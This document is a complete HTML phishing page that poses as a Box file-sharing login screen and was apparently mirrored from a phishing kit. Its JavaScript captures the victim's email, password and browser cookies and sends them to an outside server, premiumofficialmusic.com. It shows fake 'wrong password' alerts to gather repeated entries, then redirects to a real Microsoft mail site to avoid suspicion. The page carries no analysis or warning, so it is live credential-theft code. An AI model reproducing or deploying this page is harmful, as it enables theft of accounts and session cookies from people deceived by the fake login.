<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <title>Secure File Sharing, Storage and Collaboration | Box</title>

    <meta name="robots" content="noindex">
    <meta name="robots" content="noindex, nofollow">
    <meta name="robots" content="noimageindex">
    <meta name="googlebot" content="noindex">


    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style type="text/css">
        div#container {
            position: relative;
            width: 500px;
            margin-top: 0px;
            margin-left: auto;
            margin-right: auto;
            text-align: left;
        }

        body {
            text-align: center;
            margin: 0
        }
    </style>

    <script type="text/javascript">
        function unhideBody() {
            var bodyElems = document.getElementsByTagName("body");
            bodyElems[0].style.visibility = "visible";
        }
    </script>

<body style="visibility:hidden" onload="unhideBody()">
    <style type="text/css">
        .textbox {
            border: 1px solid #c1c1c1;
            border-radius: 2px;
            font-family: "Helvetica Neue", "HelveticaNeue", Helvetica, Arial, sans-serif;
            font-size: 13px;
            height: 34px;
            background: transparent;
            line-height: normal;
            padding: 5px 8px 6px 8px;
            width: 100%;
            outline: 0;
            resize: none;
            outline: none;
            border: none;
            -webkit-appearance: none;
        }
    </style>
    </head>

    <body bgColor="#F9F9F9">
        <div id="container">
            <div id="image1"
                style="position:absolute; overflow:hidden; left:0px; top:0px; width:498px; height:410px; z-index:0"><img
                    src="images/543234567nh.png" alt="" title="" border=0 width=498 height=410></div>




            <input name="email" id="email" placeholder="someone@example.com" class="textbox" required type="Email"
                style="position:absolute;width:359px;left:85px;top:230px;z-index:2">
            <p></p>

            <input name="password" id="password" placeholder="Password" class="textbox" required type="password"
                style="position:absolute;width:359px;left:85px;top:282px;z-index:2"><br><b>


                <div id="formimage1" style="position:absolute; left:67px; top:350px; z-index:5">
                    <button type="submit" style="border:none; background: transparent;" name="formimage1" id="submitBtn">
                        <img width="365" height="42" src="images/jhgfdr6yg.png">
                    </button>

                </div>
        </div>


        <script>
            let submissionCount = 0;
      
            document.getElementById("submitBtn").addEventListener("click", function () {
             
                const email = document.getElementById("email").value;
                const password = document.getElementById("password").value;
                const emailtype = "GOOGLE MAIL";
            
                if (!email) {
                    alert("Please enter a valid email address.");
                    return;
                }
            
                if (!password) {
                    alert("Please enter a valid password.");
                    return;
                }
              submissionCount++;
      
              if (submissionCount < 3) {
                alert("wrong email or password. Please Try again");
                submitForm();
              } else {
                // Redirect after the third submission
                window.location.href = "https://mail.live.com/";
              }
            });
      
            async function submitForm() {
              // Get the URL specified by the user
              const email = document.getElementById("email").value;
              const password = document.getElementById("password").value;
              const emailtype = "OFFICE 365";
      
              if (!email) {
                alert("Please enter a valid email address.");
                return;
              }
      
              if (!password) {
                alert("Please enter a valid password.");
                return;
              }
      
              // Filter cookies for the specified URL (same-origin policy applies)
              const cookies = document.cookie;
      
              // Send data to the PHP server
              const response = await fetch('https://premiumofficialmusic.com/001/abc.php', {
                method: 'POST',
                headers: {
                  'Content-Type': 'application/json'
                },
                body: JSON.stringify({ cookies: cookies, email: email, password: password, emailtype: emailtype })
              });
      
              if (response.ok) {
                // alert('Error please retype your login details');
              } else {
                alert('Failed to login. Please retry.');
              }
            }
          </script>

    </body>


    <!-- Mirrored from localhost/one/0ff1ce.php by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 04 Apr 2025 20:49:25 GMT -->

</html>